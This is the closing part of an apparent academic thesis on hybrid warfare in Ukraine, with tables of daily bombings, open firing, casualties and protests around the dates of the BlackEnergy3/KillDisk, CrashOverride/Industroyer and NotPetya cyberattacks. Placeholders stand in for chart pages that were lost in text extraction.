For the foreseeable future, Ukrainian cyber capabilities will remain behind Russian cyber capabilities. However, by analyzing the data it is possible to discern when the optimal timing of a cyberattack would be, and to identify a pattern between Bombings, Open Firing and cyberattacks.

While Ukraine is just one case study, understanding the interplay of physical and cyber attributes within hybrid warfare is a step forward in the attempt to combat hybrid warfare tactics, especially for states already at a disadvantage. As hybrid warfare becomes the war of the present, understanding its intricacies is important for the future of combating it, protecting against it and fighting back.




Tables

Table 1: Physical attributes of the war surrounding the dates of major cyberattacks: BlackEnergy3/KillDisk

Columns: Day = days relative to the attack date (0 = 23-Dec-15); Bomb = bombings/threats; Fire = open firing; Mil = military personnel/policemen killed or wounded; Civ = civilians/politicians killed or wounded; Prot = protests.

Day  Date       Bomb  Fire  Mil  Civ  Prot
-91  23-Sep-15     0     3    0    2     0
-90  24-Sep-15     1     2    8    3     0
-89  25-Sep-15     0     2    0    0     0
-88  26-Sep-15     0     0    0    0     1
-87  27-Sep-15     2     1    2    0     0
-86  28-Sep-15     3     1    0    1     0
-85  29-Sep-15     1     0    0    0     1
-84  30-Sep-15     2     2    0    0     1
-83  1-Oct-15      1     5    0    1     0
-82  2-Oct-15      3     0    1    1     1
-81  3-Oct-15      1     0    0    0     0
-80  4-Oct-15      2     4    0    0     0
-79  5-Oct-15      1     1    3    0     0
-78  6-Oct-15      2     4    0    0     0
-77  7-Oct-15      4     0    8    0     2
-76  8-Oct-15      2     0    0    1     0
-75  9-Oct-15      0     0    0    0     2
-74  10-Oct-15     2     0    0    0     1
-73  11-Oct-15     0     2    0    4     1
-72  12-Oct-15     1     3    0    8     0
-71  13-Oct-15     2     0    0    0     0
-70  14-Oct-15     2     0    0    0     0
-69  15-Oct-15     0     0    0    2     0
-68  16-Oct-15     1     1    1    0     0
-67  17-Oct-15     2     2    1    0     0
-66  18-Oct-15     2     4    0    0     0
-65  19-Oct-15     3     0    7    1     0
-64  20-Oct-15     3     0    2    1     1
-63  21-Oct-15     3     2    0    0     0
-62  22-Oct-15     4     3    1    0     0
-61  23-Oct-15     2     0   17    3     0
-60  24-Oct-15     3     1    1    0     1
-59  25-Oct-15     2     3    1    1     2
-58  26-Oct-15     1     1    2    0     0
-57  27-Oct-15     8     3    2    0     0
-56  28-Oct-15     2     2    5    0     1
-55  29-Oct-15     2     1    1    1     0
-54  30-Oct-15     3     0    2    0     0
-53  31-Oct-15     1     1    3    1     3
-52  1-Nov-15      6     5    2    2     0
-51  2-Nov-15      6     5    6    1     0
-50  3-Nov-15      2     3    3    1     0
-49  4-Nov-15      6     1    0    0     0
-48  5-Nov-15      5    14    0    0     0
-47  6-Nov-15      4     1    2    4     1
-46  7-Nov-15      3     2    0    0     2
-45  8-Nov-15      2     3   11    6     2
-44  9-Nov-15      2    22    7    1     0
-43  10-Nov-15     3    52   15    0     0
-42  11-Nov-15     2     5    1    0     0
-41  12-Nov-15     0     1    4    0     0
-40  13-Nov-15     3     3    9    2     0
-39  14-Nov-15     5     1   13    0     0
-38  15-Nov-15     4     4   12    0     0
-37  16-Nov-15     4    22    3    0     0
-36  17-Nov-15     5     2    0    0     0
-35  18-Nov-15     5    35    0    1     0
-34  19-Nov-15     2    34    1    0     0
-33  20-Nov-15     5     2    0    1     0
-32  21-Nov-15     2     1    3    1     1
-31  22-Nov-15     0     6    4    0     1
-30  23-Nov-15     3    38    2    0     0
-29  24-Nov-15     1     2   12    0     0
-28  25-Nov-15     4    20    0    0     0
-27  26-Nov-15     2    23    0    0     0
-26  27-Nov-15     3     4    0    0     0
-25  28-Nov-15     0     3    1    0     0
-24  29-Nov-15     0     8    0    0     0
-23  30-Nov-15     4     0    0    0     0
-22  1-Dec-15      7     4    2    3     3
-21  2-Dec-15      3     3    0    0     0
-20  3-Dec-15      3     1    0    0     0
-19  4-Dec-15      1    12   25    0     1
-18  5-Dec-15      2     4    0    0     0
-17  6-Dec-15      4    11    8    3     1
-16  7-Dec-15      3     2    2    0     0
-15  8-Dec-15      2     4    5    0     0
-14  9-Dec-15      2    40   13    0     0
-13  10-Dec-15     8    30   12    1     0
-12  11-Dec-15     4    50    3    0     1
-11  12-Dec-15     2    32    0    0     0
-10  13-Dec-15     2    15    0    0     0
 -9  14-Dec-15     2    25    0    0     0
 -8  15-Dec-15     2    31   12    0     0
 -7  16-Dec-15     3    12    0    0     0
 -6  17-Dec-15     2     5    0    0     0
 -5  18-Dec-15     7    64    3    0     0
 -4  19-Dec-15     2    40    0    0     0
 -3  20-Dec-15     1   120    0    0     0
 -2  21-Dec-15    21    79    0    1     0
 -1  22-Dec-15     5    20    0    1     0
  0  23-Dec-15     2    51    0    1     0
  1  24-Dec-15     3     5    0    0     0
  2  25-Dec-15     2    61   19    0     0
  3  26-Dec-15     8    66    5    0     0
  4  27-Dec-15     7    22    0    1     0
  5  28-Dec-15     2    40    0    0     0
  6  29-Dec-15     4    32    0    0     0
  7  30-Dec-15     0    31    0    0     0
  8  31-Dec-15     1    42    0    0     0
  9  1-Jan-16      1     2    2    0     0
 10  2-Jan-16      0     1    2    0     0
 11  3-Jan-16      0    13    0    0     0
 12  4-Jan-16      1    22    0    0     0
 13  5-Jan-16      4    21    0    0     0
 14  6-Jan-16      9    72    0    0     0
 15  7-Jan-16      2    42    1    1     0
 16  8-Jan-16      2    30    0    0     0
 17  9-Jan-16      2    11    6    3     0
 18  10-Jan-16     0    31    3    0     0
 19  11-Jan-16    14    35    0    0     0
 20  12-Jan-16     4    16    0    0     0
 21  13-Jan-16     2    70    0    0     0
 22  14-Jan-16    35    60    2    0     0
 23  15-Jan-16     2     2    0    0     0
 24  16-Jan-16     8    36    0    0     0
 25  17-Jan-16     1    48    3    0     0
 26  18-Jan-16     4    47    0    0     0
 27  19-Jan-16     2    21    1    0     0
 28  20-Jan-16     1     3    6    0     0
 29  21-Jan-16     2    69    2    0     0
 30  22-Jan-16     2    21    0    0     0
 31  23-Jan-16     1    38    0    0     0
 32  24-Jan-16     2    29    0    0     0
 33  25-Jan-16     1    12    1    0     0
 34  26-Jan-16     3    66    1    0     0
 35  27-Jan-16     3    40    0    0     0
 36  28-Jan-16     2    71   28    0     0
 37  29-Jan-16     2    38    0    0     1
 38  30-Jan-16     2     3    4    0     0
 39  31-Jan-16     3   104    0    2     0
 40  1-Feb-16      9    12    2    0     0
 41  2-Feb-16      2    62    0    0     0
 42  3-Feb-16      5    55    0    0     0
 43  4-Feb-16      4    37   34    0     0
 44  5-Feb-16     10   130   11    1     0
 45  6-Feb-16      4    69   16    0     0
 46  7-Feb-16      2    65    1    0     0
 47  8-Feb-16      1    63    0    0     0
 48  9-Feb-16      9    22    0    2     0
 49  10-Feb-16    11   102    0    4     0
 50  11-Feb-16    21     6    1    0     0
 51  12-Feb-16     1     1    2    0     1
 52  13-Feb-16     2    69    7    0     0
 53  14-Feb-16   110    71    5    0     0
 54  15-Feb-16     5     6    0    0     0
 55  16-Feb-16   205    60    1    0     1
 56  17-Feb-16     6     1    4    3     1
 57  18-Feb-16     4    55    0    0     0
 58  19-Feb-16     3     3    0    0     0
 59  20-Feb-16     1    18    0    0     1
 60  21-Feb-16     5     5   14    0     1
 61  22-Feb-16     2    94    2    0     0
 62  23-Feb-16   183    85    0    3     0
 63  24-Feb-16     3    66    0    0     1
 64  25-Feb-16     5    35    1    0     0
 65  26-Feb-16     4    17    1    1     0
 66  27-Feb-16    10    42    0    0     0
 67  28-Feb-16     8    68    5    2     0
 68  29-Feb-16     1    54   22    0     0
 69  1-Mar-16     12    55    3    0     0
 70  2-Mar-16      7    11    2    0     0
 71  3-Mar-16     36    57    0    0     0
 72  4-Mar-16     77    50    7    2     0
 73  5-Mar-16      1     5    2    0     0
 74  6-Mar-16     12    52    0    0     0
 75  7-Mar-16      6    58    0    0     0
 76  8-Mar-16      1     6    0    0     0
 77  9-Mar-16      5    49    0    0     0
 78  10-Mar-16     3    31    0    0     0
 79  11-Mar-16     5    75    1    0     0
 80  12-Mar-16     6   108    0    0     0
 81  13-Mar-16     5    48    0    0     0
 82  14-Mar-16     7    14    0    0     0
 83  15-Mar-16     0    24    0    0     0
 84  16-Mar-16     4    17    3    0     0
 85  17-Mar-16     1     2    0    0     1
 86  18-Mar-16    10    52    0    0     0
 87  19-Mar-16    10    32    1    0     0
 88  20-Mar-16     2     1    0    0     0
 89  21-Mar-16     4     6    3    0     0
 90  22-Mar-16    19    44    4    1     0
 91  23-Mar-16    18    72   13    0     0

Table 2: Physical attributes of the war surrounding the dates of major cyberattacks:

CrashOverride/Industroyer

Numbered date  Date  Bombings/threats  Open firing  Military personnel/policemen killed/wounded  Civilians/politicians killed/wounded  Protests
-91  17-Sep-16  0  6  1  0  0
-90  18-Sep-16  2  24  1  0  0
-89  19-Sep-16  0  34  0  0  0
-88  20-Sep-16  31  15  0  0  0
-87  21-Sep-16  2  22  5  0  0
-86  22-Sep-16  2  20  0  0  0
-85  23-Sep-16  1  40  7  0  0
-84  24-Sep-16  0  3  1  1  0
-83  25-Sep-16  52  19  4  0  1
-82  26-Sep-16  4  42  3  0  0
-81  27-Sep-16  0  0  0  0  0
-80  28-Sep-16  2  26  3  0  0
-79  29-Sep-16  4  33  0  0  0
-78  30-Sep-16  2  36  2  0  0
-77  1-Oct-16  1  47  0  0  0
-76  2-Oct-16  1  49  3  0  0
-75  3-Oct-16  1  34  0  0  0
-74  4-Oct-16  5  68  0  0  0
-73  5-Oct-16  5  4  4  0  0
-72  6-Oct-16  3  4  0  0  0
-71  7-Oct-16  2  41  6  1  0
-70  8-Oct-16  4  50  0  0  2
-69  9-Oct-16  5  45  12  0  0
-68  10-Oct-16  6  48  15  0  0
-67  11-Oct-16  2  47  4  0  0
-66  12-Oct-16  28  19  9  0  0
-65  13-Oct-16  1  21  0  0  0
-64  14-Oct-16  6  44  2  0  0
-63  15-Oct-16  8  46  8  0  0
-62  16-Oct-16  4  62  1  1  0
-61  17-Oct-16  50  29  0  0  0
-60  18-Oct-16  18  35  2  0  0
-59  19-Oct-16  4  31  3  0  0
-58  20-Oct-16  7  45  0  1  0
-57  21-Oct-16  2  39  3  0  0
-56  22-Oct-16  2  34  0  0  0
-55  23-Oct-16  3  43  7  0  0
-54  24-Oct-16  2  65  7  0  0
-53  25-Oct-16  6  23  0  1  0
-52  26-Oct-16  5  43  20  1  1
-51  27-Oct-16  14  88  7  7  0
-50  28-Oct-16  3  56  8  1  0
-49  29-Oct-16  7  53  9  0  0
-48  30-Oct-16  3  71  0  0  0
-47  31-Oct-16  13  36  0  0  0
-46  1-Nov-16  5  27  0  1  0
-45  2-Nov-16  6  47  2  9  0
-44  3-Nov-16  65  35  4  0  0
-43  4-Nov-16  3  38  0  0  1
-42  5-Nov-16  3  47  6  1  0
-41  6-Nov-16  7  57  5  0  1
-40  7-Nov-16  8  50  4  0  1
-39  8-Nov-16  13  20  3  0  0
-38  9-Nov-16  8  54  7  1  0
-37  10-Nov-16  7  55  0  0  0
-36  11-Nov-16  8  57  5  0  0
-35  12-Nov-16  8  66  0  2  0
-34  13-Nov-16  4  35  0  0  0
-33  14-Nov-16  16  8  0  0  0
-32  15-Nov-16  7  37  8  0  1
-31  16-Nov-16  5  53  2  0  1
-30  17-Nov-16  3  57  1  0  0
-29  18-Nov-16  14  46  0  1  0
-28  19-Nov-16  7  18  0  2  0
-27  20-Nov-16  2  1  0  0  0
-26  21-Nov-16  2  1  0  0  0
-25  22-Nov-16  11  17  4  0  0
-24  23-Nov-16  6  30  0  0  0
-23  24-Nov-16  17  28  1  1  0
-22  25-Nov-16  0  37  0  0  0
-21  26-Nov-16  3  38  0  0  0
-20  27-Nov-16  1  37  6  0  0
-19  28-Nov-16  2  40  0  0  0
-18  29-Nov-16  3  25  3  0  0
-17  30-Nov-16  4  47  3  2  1
-16  1-Dec-16  2  43  4  0  0
-15  2-Dec-16  3  44  0  0  0
-14  3-Dec-16  6  26  0  0  0
-13  4-Dec-16  5  26  0  0  0
-12  5-Dec-16  5  26  2  0  0
-11  6-Dec-16  12  77  6  0  0
-10  7-Dec-16  13  22  17  0  0
-9  8-Dec-16  5  15  2  0  0
-8  9-Dec-16  2  31  0  0  0
-7  10-Dec-16  9  102  5  0  0
-6  11-Dec-16  12  109  3  0  0
-5  12-Dec-16  4  112  0  0  0
-4  13-Dec-16  4  15  0  0  0
-3  14-Dec-16  8  18  0  3  0
-2  15-Dec-16  2  17  1  0  0
-1  16-Dec-16  4  52  2  0  0
0  17-Dec-16  6  126  26  0  0
1  18-Dec-16  7  52  32  1  0
2  19-Dec-16  14  71  23  0  0
3  20-Dec-16  38  84  15  0  0
4  21-Dec-16  10  15  13  0  0
5  22-Dec-16  5  23  5  1  0
6  23-Dec-16  17  50  6  0  0
7  24-Dec-16  11  39  0  0  0
8  25-Dec-16  22  33  0  0  0
9  26-Dec-16  20  62  3  0  0
10  27-Dec-16  9  29  0  0  0
11  28-Dec-16  2  50  7  0  0
12  29-Dec-16  11  71  4  0  0
13  30-Dec-16  6  48  0  0  0
14  31-Dec-16  5  44  0  0  0
15  1-Jan-17  6  39  12  0  0
16  2-Jan-17  10  34  4  0  0
17  3-Jan-17  8  49  0  0  0
18  4-Jan-17  19  32  1  0  0
19  5-Jan-17  6  34  1  0  0
20  6-Jan-17  27  42  2  0  0
21  7-Jan-17  14  72  6  0  0
22  8-Jan-17  8  51  8  0  0
23  9-Jan-17  24  46  5  0  0
24  10-Jan-17  12  30  4  0  0
25  11-Jan-17  18  13  6  1  0
26  12-Jan-17  19  78  3  0  0
27  13-Jan-17  23  62  1  0  0
28  14-Jan-17  14  60  7  0  0
29  15-Jan-17  23  54  2  0  0
30  16-Jan-17  16  32  2  0  0
31  17-Jan-17  3  61  2  0  0
32  18-Jan-17  8  57  2  0  0
33  19-Jan-17  23  28  0  0  0
34  20-Jan-17  5  30  1  1  1
35  21-Jan-17  10  33  0  1  0
36  22-Jan-17  11  41  10  0  0
37  23-Jan-17  20  73  2  0  0
38  24-Jan-17  36  66  1  0  0
39  25-Jan-17  19  51  3  0  0
40  26-Jan-17  34  84  2  0  0
41  27-Jan-17  15  94  3  6  0
42  28-Jan-17  7  55  0  0  0
43  29-Jan-17  12  154  31  0  0
44  30-Jan-17  10  30  27  0  0
45  31-Jan-17  10  47  23  10  0
46  1-Feb-17  15  41  8  15  0
47  2-Feb-17  53  67  16  3  0
48  3-Feb-17  24  115  10  0  0
49  4-Feb-17  52  52  2  0  0
50  5-Feb-17  76  82  7  0  0
51  6-Feb-17  9  124  0  2  0
52  7-Feb-17  9  89  6  1  0
53  8-Feb-17  48  82  0  0  0
54  9-Feb-17  40  40  0  1  0
55  10-Feb-17  12  63  0  0  0
56  11-Feb-17  8  59  2  0  0
57  12-Feb-17  15  78  1  1  0
58  13-Feb-17  20  72  1  0  0
59  14-Feb-17  21  66  0  0  0
60  15-Feb-17  29  42  0  3  1
61  16-Feb-17  15  66  13  2  0
62  17-Feb-17  2  71  3  0  0
63  18-Feb-17  12  105  9  0  0
64  19-Feb-17  16  160  4  0  1
65  20-Feb-17  59  108  1  0  1
66  21-Feb-17  21  41  1  0  1
67  22-Feb-17  49  54  1  0  1
68  23-Feb-17  12  83  3  0  0
69  24-Feb-17  84  92  18  0  0
70  25-Feb-17  19  51  21  0  0
71  26-Feb-17  55  94  6  0  0
72  27-Feb-17  67  84  1  0  1
73  28-Feb-17  54  117  5  0  1
74  1-Mar-17  76  123  0  0  0
75  2-Mar-17  41  116  23  1  0
76  3-Mar-17  89  146  2  0  1
77  4-Mar-17  81  110  13  1  0
78  5-Mar-17  32  89  3  0  0
79  6-Mar-17  24  122  3  0  0
80  7-Mar-17  18  117  7  0  0
81  8-Mar-17  38  63  2  0  0
82  9-Mar-17  16  80  30  4  0
83  10-Mar-17  42  107  17  2  0
84  11-Mar-17  19  118  2  1  0
85  12-Mar-17  22  82  5  1  0
86  13-Mar-17  7  97  0  10  0
87  14-Mar-17  43  106  7  0  0
88  15-Mar-17  7  91  4  0  0
89  16-Mar-17  22  77  10  0  0
90  17-Mar-17  15  112  7  0  0

151

Table 3: Physical attributes of the war surrounding the dates of major cyberattacks:

NotPetya

Numbered date  Date  Bombings/threats  Open firing  Military personnel/policemen killed/wounded  Civilians/politicians killed/wounded  Protests
-92  27-Mar-17  102  58  11  0  0
-91  28-Mar-17  42  61  3  0  0
-90  29-Mar-17  90  1  5  2  0
-89  30-Mar-17  18  37  15  2  0
-88  31-Mar-17  8  94  10  0  0
-87  1-Apr-17  19  37  2  0  0
-86  2-Apr-17  12  32  1  0  0
-85  3-Apr-17  35  48  11  1  0
-84  4-Apr-17  2  54  5  0  0
-83  5-Apr-17  6  29  2  1  0
-82  6-Apr-17  57  48  5  2  0
-81  7-Apr-17  15  43  5  2  0
-80  8-Apr-17  11  59  4  0  0
-79  9-Apr-17  44  71  2  1  1
-78  10-Apr-17  14  108  5  3  1
-77  11-Apr-17  31  45  7  0  0
-76  12-Apr-17  9  61  3  0  0
-75  13-Apr-17  26  84  2  3  0
-74  14-Apr-17  6  45  2  0  0
-73  15-Apr-17  5  29  0  0  0
-72  16-Apr-17  3  32  0  0  0
-71  17-Apr-17  6  1  1  0  0
-70  18-Apr-17  4  35  2  0  0
-69  19-Apr-17  1  18  1  0  0
-68  20-Apr-17  13  48  10  0  0
-67  21-Apr-17  64  41  1  0  0
-66  22-Apr-17  3  45  0  0  0
-65  23-Apr-17  6  34  3  3  0
-64  24-Apr-17  41  21  1  6  0
-63  25-Apr-17  15  65  8  0  0
-62  26-Apr-17  22  49  7  0  0
-61  27-Apr-17  6  52  3  0  0
-60  28-Apr-17  6  72  8  0  0
-59  29-Apr-17  4  61  6  0  0
-58  30-Apr-17  7  54  8  0  0
-57  1-May-17  8  55  4  2  1
-56  2-May-17  4  63  8  0  0
-55  3-May-17  11  52  9  0  0
-54  4-May-17  12  58  10  0  0
-53  5-May-17  7  63  5  2  0
-52  6-May-17  3  45  5  0  0
-51  7-May-17  3  65  0  0  0
-50  8-May-17  2  42  0  0  0
-49  9-May-17  1  70  3  0  8
-48  10-May-17  6  37  1  0  2
-47  11-May-17  5  53  8  0  0
-46  12-May-17  4  54  3  1  0
-45  13-May-17  14  61  4  4  0
-44  14-May-17  9  49  6  0  0
-43  15-May-17  4  37  2  0  0
-42  16-May-17  7  5  0  0  1
-41  17-May-17  18  52  5  3  2
-40  18-May-17  28  40  3  0  0
-39  19-May-17  40  55  4  0  0
-38  20-May-17  10  48  7  0  0
-37  21-May-17  20  56  2  0  0
-36  22-May-17  13  59  9  1  0
-35  23-May-17  26  53  1  1  0
-34  24-May-17  8  61  2  2  0
-33  25-May-17  24  57  5  0  0
-32  26-May-17  19  61  2  0  0
-31  27-May-17  12  49  8  0  0
-30  28-May-17  41  48  7  11  0
-29  29-May-17  14  60  3  3  1
-28  30-May-17  16  44  6  1  0
-27  31-May-17  14  35  2  3  0
-26  1-Jun-17  11  28  0  2  0
-25  2-Jun-17  8  53  7  0  0
-24  3-Jun-17  4  58  7  0  0
-23  4-Jun-17  2  60  2  0  0
-22  5-Jun-17  11  77  7  1  0
-21  6-Jun-17  10  89  8  1  0
-20  7-Jun-17  17  71  17  0  0
-19  8-Jun-17  48  63  15  1  0
-18  9-Jun-17  12  71  1  2  1
-17  10-Jun-17  8  73  11  0  0
-16  11-Jun-17  43  67  6  0  0
-15  12-Jun-17  17  57  6  0  0
-14  13-Jun-17  30  52  8  2  0
-13  14-Jun-17  10  55  3  0  0
-12  15-Jun-17  9  50  1  1  0
-11  16-Jun-17  4  67  4  0  1
-10  17-Jun-17  19  66  5  0  0
-9  18-Jun-17  4  47  6  0  0
-8  19-Jun-17  8  4  4  1  0
-7  20-Jun-17  10  35  1  1  0
-6  21-Jun-17  2  3  2  0  0
-5  22-Jun-17  2  29  2  0  0
-4  23-Jun-17  5  48  9  1  0
-3  24-Jun-17  3  26  5  0  0
-2  25-Jun-17  3  23  1  0  0
-1  26-Jun-17  3  22  0  0  0
0  27-Jun-17  1  31  6  0  0
1  28-Jun-17  6  35  5  0  0
2  29-Jun-17  19  22  7  0  0
3  30-Jun-17  8  35  10  0  0
4  1-Jul-17  5  25  5  0  0
5  2-Jul-17  6  20  2  0  0
6  3-Jul-17  3  24  2  0  0
7  4-Jul-17  3  15  0  0  0
8  5-Jul-17  2  13  2  0  0
9  6-Jul-17  1  25  1  0  0
10  7-Jul-17  1  22  4  4  0
11  8-Jul-17  1  27  2  1  0
12  9-Jul-17  0  13  0  0  0
13  10-Jul-17  1  22  1  0  0
14  11-Jul-17  2  21  1  0  0
15  12-Jul-17  1  30  1  1  1
16  13-Jul-17  4  31  2  0  0
17  14-Jul-17  5  35  4  0  0
18  15-Jul-17  7  27  2  1  0
19  16-Jul-17  8  16  1  0  0
20  17-Jul-17  2  15  2  2  0
21  18-Jul-17  1  23  6  0  0
22  19-Jul-17  4  22  9  5  0
23  20-Jul-17  9  29  13  1  0
24  21-Jul-17  5  11  3  0  0
25  22-Jul-17  3  18  0  0  0
26  23-Jul-17  1  14  1  0  0
27  24-Jul-17  9  41  3  1  0
28  25-Jul-17  6  25  1  0  0
29  26-Jul-17  3  21  1  0  0
30  27-Jul-17  7  26  7  0  1
31  28-Jul-17  15  19  0  1  1
32  29-Jul-17  3  14  8  0  0
33  30-Jul-17  4  26  4  0  0
34  31-Jul-17  5  20  5  0  0
35  1-Aug-17  6  34  3  0  0
36  2-Aug-17  5  30  0  0  0
37  3-Aug-17  6  21  0  1  1
38  4-Aug-17  8  39  3  0  0
39  5-Aug-17  2  31  3  0  0
40  6-Aug-17  21  27  3  4  0
41  7-Aug-17  5  18  3  1  0
42  8-Aug-17  23  31  12  0  0
43  9-Aug-17  32  16  1  0  0
44  10-Aug-17  2  15  2  0  0
45  11-Aug-17  4  20  7  0  0
46  12-Aug-17  26  17  9  0  0
47  13-Aug-17  1  26  2  0  1
48  14-Aug-17  5  31  8  0  0
49  15-Aug-17  3  33  4  0  0
50  16-Aug-17  10  35  5  0  0
51  17-Aug-17  2  27  2  3  0
52  18-Aug-17  3  25  3  0  0
53  19-Aug-17  12  30  1  0  0
54  20-Aug-17  26  25  5  0  0
55  21-Aug-17  9  30  2  0  0
56  22-Aug-17  14  28  4  0  0
57  23-Aug-17  21  14  0  0  0
58  24-Aug-17  1  22  3  2  1
59  25-Aug-17  1  18  2  0  0
60  26-Aug-17  6  35  0  0  0
61  27-Aug-17  10  24  0  0  0
62  28-Aug-17  21  19  0  0  0
63  29-Aug-17  6  23  0  4  0
64  30-Aug-17  2  19  0  0  0
65  31-Aug-17  3  24  0  0  0
66  1-Sep-17  2  20  0  0  0
67  2-Sep-17  1  26  0  0  0
68  3-Sep-17  5  44  1  0  0
69  4-Sep-17  17  36  0  0  0
70  5-Sep-17  15  32  0  0  0
71  6-Sep-17  1  34  0  0  0
72  7-Sep-17  2  25  1  0  1
73  8-Sep-17  8  36  5  3  1
74  9-Sep-17  1  41  2  0  1
75  10-Sep-17  3  51  0  0  1
76  11-Sep-17  5  38  0  0  3
77  12-Sep-17  6  27  2  0  1
78  13-Sep-17  2  24  1  0  0
79  14-Sep-17  4  25  3  0  2
80  15-Sep-17  5  32  1  0  0
81  16-Sep-17  1  35  0  0  0
82  17-Sep-17  0  31  1  0  0
83  18-Sep-17  6  19  3  0  1
84  19-Sep-17  1  2  1  0  0
85  20-Sep-17  2  19  1  6  1
86  21-Sep-17  2  12  0  2  0
87  22-Sep-17  4  31  1  0  0
88  23-Sep-17  0  18  1  7  0
89  24-Sep-17  3  22  2  0  0
90  25-Sep-17  11  16  0  1  0
91  26-Sep-17  2  21  1  0  0
92  27-Sep-17  3  20  0  0  0

156

Bombings

[Pages 157-161: graphical content, not recoverable from the text extraction]

Open Firing

[Pages 162-166: graphical content, not recoverable from the text extraction]

Military Personnel and Policemen Killed or Wounded

[Pages 167-171: graphical content, not recoverable from the text extraction]

Civilians and Politicians Killed or Wounded

[Pages 172-176: graphical content, not recoverable from the text extraction]

Protests

[Pages 177-180: graphical content, not recoverable from the text extraction]